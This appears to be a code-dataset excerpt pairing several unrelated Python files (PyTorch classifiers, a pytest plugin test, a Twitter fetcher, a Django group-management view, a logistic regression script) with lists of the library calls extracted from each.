"""Convolutional Neural Net for Classification
"""
def __init__(self,num_classes):
super(ConvNNMNIST, self).__init__()
self.num_classes = num_classes
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
def blockConv2D(in_channels, out_channels, kernel_size, stride, padding):
Layers = [nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding)]
Layers.append(nn.BatchNorm2d(out_channels))
Layers.append(nn.ReLU())
return Layers
self.model = nn.Sequential(
*blockConv2D(1,16,7,1,2),
*blockConv2D(16,32,6,2,2),
*blockConv2D(32,64,5,1,2),
*blockConv2D(64,64,5,2,2),
Flatten(),
*blockLinear(3136,64),
*blockLinear(64,32),
nn.Linear(32,num_classes)
)
def forward(self,x):
return self.model(x)
class PenDigNN(nn.Module):
"""Fully-connected Neural Net for Classification
"""
def __init__(self,input_size):
super(PenDigNN, self).__init__()
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
self.layer1 = nn.Sequential(
*blockLinear(input_size,32)
)
self.layer2 = nn.Sequential(
*blockLinear(32,16)
)
self.layer3 = nn.Sequential(
*blockLinear(16,16)
)
self.layer4 = nn.Linear(16,10)
def forward(self,images,ids,strokes,time):
images = torch.reshape(images,(-1,64))
strokes = torch.unsqueeze(strokes,1)
time = torch.unsqueeze(time,1)
in1 = torch.cat((images,ids,strokes,time),dim=1)
out1 = self.layer1(in1)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
return self.layer4(out3)
| [
"torch.nn.BatchNorm2d",
"torch.nn.ReLU",
"torch.unsqueeze",
"torch.nn.Conv2d",
"torch.nn.BatchNorm1d",
"torch.nn.Linear",
"torch.reshape",
"torch.cat"
] | [((3148, 3165), 'torch.nn.Linear', 'nn.Linear', (['(16)', '(10)'], {}), '(16, 10)\n', (3157, 3165), True, 'import torch.nn as nn\n'), ((3238, 3269), 'torch.reshape', 'torch.reshape', (['images', '(-1, 64)'], {}), '(images, (-1, 64))\n', (3251, 3269), False, 'import torch\n'), ((3286, 3313), 'torch.unsqueeze', 'torch.unsqueeze', (['strokes', '(1)'], {}), '(strokes, 1)\n', (3301, 3313), False, 'import torch\n'), ((3328, 3352), 'torch.unsqueeze', 'torch.unsqueeze', (['time', '(1)'], {}), '(time, 1)\n', (3343, 3352), False, 'import torch\n'), ((3366, 3412), 'torch.cat', 'torch.cat', (['(images, ids, strokes, time)'], {'dim': '(1)'}), '((images, ids, strokes, time), dim=1)\n', (3375, 3412), False, 'import torch\n'), ((1215, 1241), 'torch.nn.Linear', 'nn.Linear', (['(32)', 'num_classes'], {}), '(32, num_classes)\n', (1224, 1241), True, 'import torch.nn as nn\n'), ((2343, 2369), 'torch.nn.Linear', 'nn.Linear', (['(32)', 'num_classes'], {}), '(32, num_classes)\n', (2352, 2369), True, 'import torch.nn as nn\n'), ((481, 517), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (490, 517), True, 'import torch.nn as nn\n'), ((544, 572), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (558, 572), True, 'import torch.nn as nn\n'), ((600, 609), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (607, 609), True, 'import torch.nn as nn\n'), ((742, 828), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', 'kernel_size'], {'stride': 'stride', 'padding': 'padding'}), '(in_channels, out_channels, kernel_size, stride=stride, padding=\n padding)\n', (751, 828), True, 'import torch.nn as nn\n'), ((851, 879), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (865, 879), True, 'import torch.nn as nn\n'), ((907, 916), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (914, 916), True, 'import torch.nn as nn\n'), ((1609, 1645), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (1618, 1645), True, 'import torch.nn as nn\n'), ((1672, 1700), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (1686, 1700), True, 'import torch.nn as nn\n'), ((1728, 1737), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1735, 1737), True, 'import torch.nn as nn\n'), ((1870, 1956), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', 'kernel_size'], {'stride': 'stride', 'padding': 'padding'}), '(in_channels, out_channels, kernel_size, stride=stride, padding=\n padding)\n', (1879, 1956), True, 'import torch.nn as nn\n'), ((1979, 2007), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (1993, 2007), True, 'import torch.nn as nn\n'), ((2035, 2044), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (2042, 2044), True, 'import torch.nn as nn\n'), ((2693, 2729), 'torch.nn.Linear', 'nn.Linear', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (2702, 2729), True, 'import torch.nn as nn\n'), ((2756, 2784), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (2770, 2784), True, 'import torch.nn as nn\n'), ((2812, 2821), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (2819, 2821), True, 'import torch.nn as nn\n')] |
# Copyright The OpenTelemetry Authors
# SPDX-License-Identifier: Apache-2.0
import pytest
from utils import assertTest
pytest_plugins = ["pytester"]
common_code = """
import os
import time
import logging
import pytest
"""
def test_skip_plugin(pytester, otel_service):
"""test a skipped test"""
pytester.makepyfile(
common_code
+ """
@pytest.mark.skip
def test_skip():
assert True
""")
assertTest(pytester, None, "passed", "STATUS_CODE_OK", None, None)
| [
"utils.assertTest"
] | [((423, 489), 'utils.assertTest', 'assertTest', (['pytester', 'None', '"""passed"""', '"""STATUS_CODE_OK"""', 'None', 'None'], {}), "(pytester, None, 'passed', 'STATUS_CODE_OK', None, None)\n", (433, 489), False, 'from utils import assertTest\n')] |
import flask
from os import getenv, name
from .models import db, Tweet, User
import tweepy
import spacy
# Authenticates us and allows us to use the Twitter API
TWITTER_API_KEY = getenv("TWITTER_API_KEY")
TWITTER_API_KEY_SECRET = getenv("TWITTER_API_SECRET")
TWITTER_AUTH = tweepy.OAuthHandler(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)
api = tweepy.API(TWITTER_AUTH)
def add_or_update_user(username):
twitter_user = api.get_user(username)
db_user = User.query.get(twitter_user.id) or User(id=twitter_user.id, name=username)
db.session.add(db_user)
tweets = twitter_user.timeline(
count=200,
exclude_replies=True,
include_rts=False,
tweet_mode="extended",
since_id=db_user.newest_tweet_id
)
if tweets:
db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
db_tweet = Tweet(id=tweet.id, text=tweet.full_text)
db_user.tweets.append(db_tweet)
db.session.add(db_tweet)
db.session.commit()
def update_all_users():
"""Update all existing users."""
for user in User.query.all():
add_or_update_user(user.name) | [
"tweepy.API",
"os.getenv",
"tweepy.OAuthHandler"
] | [((186, 211), 'os.getenv', 'getenv', (['"""TWITTER_API_KEY"""'], {}), "('TWITTER_API_KEY')\n", (192, 211), False, 'from os import getenv, name\n'), ((238, 266), 'os.getenv', 'getenv', (['"""TWITTER_API_SECRET"""'], {}), "('TWITTER_API_SECRET')\n", (244, 266), False, 'from os import getenv, name\n'), ((285, 345), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['TWITTER_API_KEY', 'TWITTER_API_KEY_SECRET'], {}), '(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)\n', (304, 345), False, 'import tweepy\n'), ((353, 377), 'tweepy.API', 'tweepy.API', (['TWITTER_AUTH'], {}), '(TWITTER_AUTH)\n', (363, 377), False, 'import tweepy\n')] |
import torch
from common.utils.clip_pad import *
class BatchCollator(object):
def __init__(self, dataset, phrase_cls=False, append_ind=False):
self.dataset = dataset
self.test_mode = self.dataset.test_mode
self.data_names = self.dataset.data_names
self.append_ind = append_ind
self.phrase_cls = phrase_cls
def __call__(self, batch):
if not isinstance(batch, list):
batch = list(batch)
max_shape = tuple(max(s) for s in zip(*[data[self.data_names.index('image')].shape for data in batch]))
max_boxes = max([data[self.data_names.index('boxes')].shape[0] for data in batch])
max_caption1_length = max([len(data[self.data_names.index('caption1')]) for data in batch])
max_caption2_length = max([len(data[self.data_names.index('caption2')]) for data in batch])
if self.phrase_cls and 'label' in self.data_names:
max_label_length = max([len(data[self.data_names.index('label')]) for data in batch])
max_n_phrases = max([data[self.data_names.index('caption1')].shape[1] for data in batch]) - 2
for i, ibatch in enumerate(batch):
out = {}
image = ibatch[self.data_names.index('image')]
out['image'] = clip_pad_images(image, max_shape, pad=0)
boxes = ibatch[self.data_names.index('boxes')]
out['boxes'] = clip_pad_boxes(boxes, max_boxes, pad=-1)
caption1 = ibatch[self.data_names.index('caption1')]
caption2 = ibatch[self.data_names.index('caption2')]
dimension_caption1 = 2 + max_n_phrases if self.phrase_cls else len(caption1[0])
dimension_caption2 = 2 + max_n_phrases if self.phrase_cls else len(caption2[0])
out['caption1'] = clip_pad_2d(caption1, (max_caption1_length, dimension_caption1), pad=0)
out['caption2'] = clip_pad_2d(caption2, (max_caption2_length, dimension_caption2), pad=0)
out['im_info'] = ibatch[self.data_names.index('im_info')]
if 'label' in self.data_names:
out['label'] = ibatch[self.data_names.index('label')]
if self.phrase_cls:
label = ibatch[self.data_names.index('label')]
out['label'] = clip_pad_2d(label, (max_label_length, len(label[0])), pad=-1)
other_names = [data_name for data_name in self.data_names if data_name not in out]
for name in other_names:
out[name] = torch.as_tensor(ibatch[self.data_names.index(name)])
batch[i] = tuple(out[data_name] for data_name in self.data_names)
if self.append_ind:
batch[i] += (torch.tensor(i, dtype=torch.int64),)
out_tuple = ()
for k, items in enumerate(zip(*batch)):
if isinstance(items[0], torch.Tensor):
out_tuple += (torch.stack(tuple(items), dim=0), )
else:
out_tuple += (list(items), )
return out_tuple
| [
"torch.tensor"
] | [((2718, 2752), 'torch.tensor', 'torch.tensor', (['i'], {'dtype': 'torch.int64'}), '(i, dtype=torch.int64)\n', (2730, 2752), False, 'import torch\n')] |
# Group info
# Groups and Users
from django.contrib.auth.models import Group, User
# Responses
from rest_framework import status
from rest_framework.response import Response
# For getting objects out of the database.
from ..utilities import DbUtils
# Checking that a user is in a group.
from ..utilities import UserUtils
from ...models import group_info
def POST_api_groups_modify(request):
# Instantiate any necessary imports.
db = DbUtils.DbUtils()
uu = UserUtils.UserUtils()
# Define the bulk request.
bulk_request = request.data['POST_api_groups_modify']
# Establish who has made the request.
requestor_info = uu.user_from_request(rq=request)
# Get all group names.
# This is a better solution than querying for
# each individual group name.
groups = list(Group.objects.all().values_list('name', flat=True))
# Construct an array to return information about processing
# the request.
returning = []
# Since bulk_request is an array, go over each
# item in the array.
for modification_object in bulk_request:
# Standardize the group name.
standardized = modification_object['name'].lower()
if standardized in groups:
# Get the group and its information.
grouped = Group.objects.get(name=standardized)
import pdb; pdb.set_trace()
# Check that the requestor is the group admin.
if requestor_info.is_superuser == True or grouped in requestor_info.groups.all():
try:
group_information = group_info.objects.get(group=grouped)
except:
group_information = group_info.objects.create(group=grouped, owner_user=requestor_info)
# Process the request.
# We only care about the actions at this point.
if 'actions' in modification_object:
# Set the working object to the actions.
action_set = modification_object['actions']
# Invalid inputs don't throw 400, 401, or 403 for the
# request. That is, provided parameters that don't
# exist (for example, an owner_user that does not exist)
# simply get skipped over.
# First do the "easy" tasks - name and description.
# Change name of group if set in actions
if 'rename' in action_set:
# Simply re-name to whatever we've been provided,
# assuming the group doesn't already exist.
if action_set['rename'] not in groups:
grouped.name = action_set['rename']
grouped.save()
# Change description of group if set in actions.
if 'redescribe' in action_set:
group_information.description = action_set['redescribe']
group_information.save()
# Now the ownership tasks.
# TODO: Is owner_group defined for this type of object?
# Does not appear to be set, also does not appear to be inherited.
# WARNING: This could cause an error if this is sent in!
if 'owner_group' in action_set:
# Make sure the provided owner group exists.
if uu.check_group_exists(n=action_set['owner_group']):
group_information.owner_group = Group.objects.get(
name=action_set['owner_group']
)
group_information.save()
else:
# TODO: This seems to be some type of error state
pass
if 'owner_user' in action_set:
# Make sure the provided owner user exists.
if uu.check_user_exists(un=action_set['owner_user']):
group_information.owner_user = User.objects.get(
username=action_set['owner_user']
)
group_information.save()
else:
# TODO: This seems to be some type of error state
pass
# Finally, perform the set logic to add and remove
# users and groups.
# Get all users in the group.
all_users = set([i.username for i in list(grouped.user_set.all())])
# Removals are processed first, then additions.
# Remove the users provided, if any.
if 'remove_users' in action_set:
all_users = all_users - set(
list(
User.objects.filter(
username__in=action_set['remove_users']
).values_list('username', flat=True)
)
)
# Get the users in the groups provided, if any.
if 'disinherit_from' in action_set:
# Get all the groups first, then get the user list.
rm_group_users = list(
User.objects.filter(
groups__in=Group.objects.filter(
name__in=action_set['disinherit_from']
)
).values_list('username', flat=True)
)
all_users = all_users - set(rm_group_users)
# Addition explained at https://stackoverflow.com/a/1306663
# Add the users provided, if any.
if 'add_users' in action_set:
all_users.update(
list(
User.objects.filter(
username__in=action_set['add_users']
).values_list('username', flat=True)
)
)
# Get the users in the groups provided, if any.
if 'inherit_from' in action_set:
# Get all the groups first, then get the user list.
a_group_users = list(
User.objects.filter(
groups__in=Group.objects.filter(
name__in=action_set['inherit_from']
)
).values_list('username', flat=True)
)
all_users.update(a_group_users)
else:
pass
returning.append(db.messages(parameters={'group': grouped.name})['200_OK_group_modify'])
else:
# Requestor is not the admin.
returning.append(db.messages(parameters={})['403_insufficient_permissions'])
else:
# Update the request status.
returning.append(db.messages(parameters={})['400_bad_request'])
# As this view is for a bulk operation, status 200
# means that the request was successfully processed,
# but NOT necessarily each item in the request.
return Response(status=status.HTTP_200_OK, data=returning)
| [
"django.contrib.auth.models.Group.objects.get",
"django.contrib.auth.models.Group.objects.filter",
"django.contrib.auth.models.Group.objects.all",
"django.contrib.auth.models.User.objects.filter",
"rest_framework.response.Response",
"pdb.set_trace",
"django.contrib.auth.models.User.objects.get"
] | [((7628, 7679), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_200_OK', 'data': 'returning'}), '(status=status.HTTP_200_OK, data=returning)\n', (7636, 7679), False, 'from rest_framework.response import Response\n'), ((1294, 1330), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': 'standardized'}), '(name=standardized)\n', (1311, 1330), False, 'from django.contrib.auth.models import Group, User\n'), ((1355, 1370), 'pdb.set_trace', 'pdb.set_trace', ([], {}), '()\n', (1368, 1370), False, 'import pdb\n'), ((811, 830), 'django.contrib.auth.models.Group.objects.all', 'Group.objects.all', ([], {}), '()\n', (828, 830), False, 'from django.contrib.auth.models import Group, User\n'), ((3607, 3656), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': "action_set['owner_group']"}), "(name=action_set['owner_group'])\n", (3624, 3656), False, 'from django.contrib.auth.models import Group, User\n'), ((4170, 4221), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': "action_set['owner_user']"}), "(username=action_set['owner_user'])\n", (4186, 4221), False, 'from django.contrib.auth.models import Group, User\n'), ((6174, 6231), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__in': "action_set['add_users']"}), "(username__in=action_set['add_users'])\n", (6193, 6231), False, 'from django.contrib.auth.models import Group, User\n'), ((5027, 5087), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__in': "action_set['remove_users']"}), "(username__in=action_set['remove_users'])\n", (5046, 5087), False, 'from django.contrib.auth.models import Group, User\n'), ((5589, 5649), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'name__in': "action_set['disinherit_from']"}), "(name__in=action_set['disinherit_from'])\n", (5609, 5649), False, 'from django.contrib.auth.models import Group, User\n'), ((6729, 6786), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'name__in': "action_set['inherit_from']"}), "(name__in=action_set['inherit_from'])\n", (6749, 6786), False, 'from django.contrib.auth.models import Group, User\n')] |
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from itertools import combinations
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
X_train = pd.read_csv('X-train-raw.csv')
X_test = pd.read_csv('X-test-raw.csv')
y_train = pd.read_csv('y-train-raw.csv').values.ravel()
y_test = pd.read_csv('y-test-raw.csv').values.ravel()
model = LogisticRegression(random_state = 2, max_iter = 10000)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
acc = round(accuracy_score(y_pred, y_test)*100,2)
f1 = round(f1_score(y_pred, y_test)*100,2)
print(acc, f1) # 73.97 38.71
| [
"sklearn.metrics.f1_score",
"sklearn.metrics.accuracy_score",
"pandas.read_csv",
"sklearn.linear_model.LogisticRegression"
] | [((281, 311), 'pandas.read_csv', 'pd.read_csv', (['"""X-train-raw.csv"""'], {}), "('X-train-raw.csv')\n", (292, 311), True, 'import pandas as pd\n'), ((321, 350), 'pandas.read_csv', 'pd.read_csv', (['"""X-test-raw.csv"""'], {}), "('X-test-raw.csv')\n", (332, 350), True, 'import pandas as pd\n'), ((473, 523), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'random_state': '(2)', 'max_iter': '(10000)'}), '(random_state=2, max_iter=10000)\n', (491, 523), False, 'from sklearn.linear_model import LogisticRegression\n'), ((601, 631), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y_pred', 'y_test'], {}), '(y_pred, y_test)\n', (615, 631), False, 'from sklearn.metrics import accuracy_score, f1_score\n'), ((650, 674), 'sklearn.metrics.f1_score', 'f1_score', (['y_pred', 'y_test'], {}), '(y_pred, y_test)\n', (658, 674), False, 'from sklearn.metrics import accuracy_score, f1_score\n'), ((362, 392), 'pandas.read_csv', 'pd.read_csv', (['"""y-train-raw.csv"""'], {}), "('y-train-raw.csv')\n", (373, 392), True, 'import pandas as pd\n'), ((417, 446), 'pandas.read_csv', 'pd.read_csv', (['"""y-test-raw.csv"""'], {}), "('y-test-raw.csv')\n", (428, 446), True, 'import pandas as pd\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.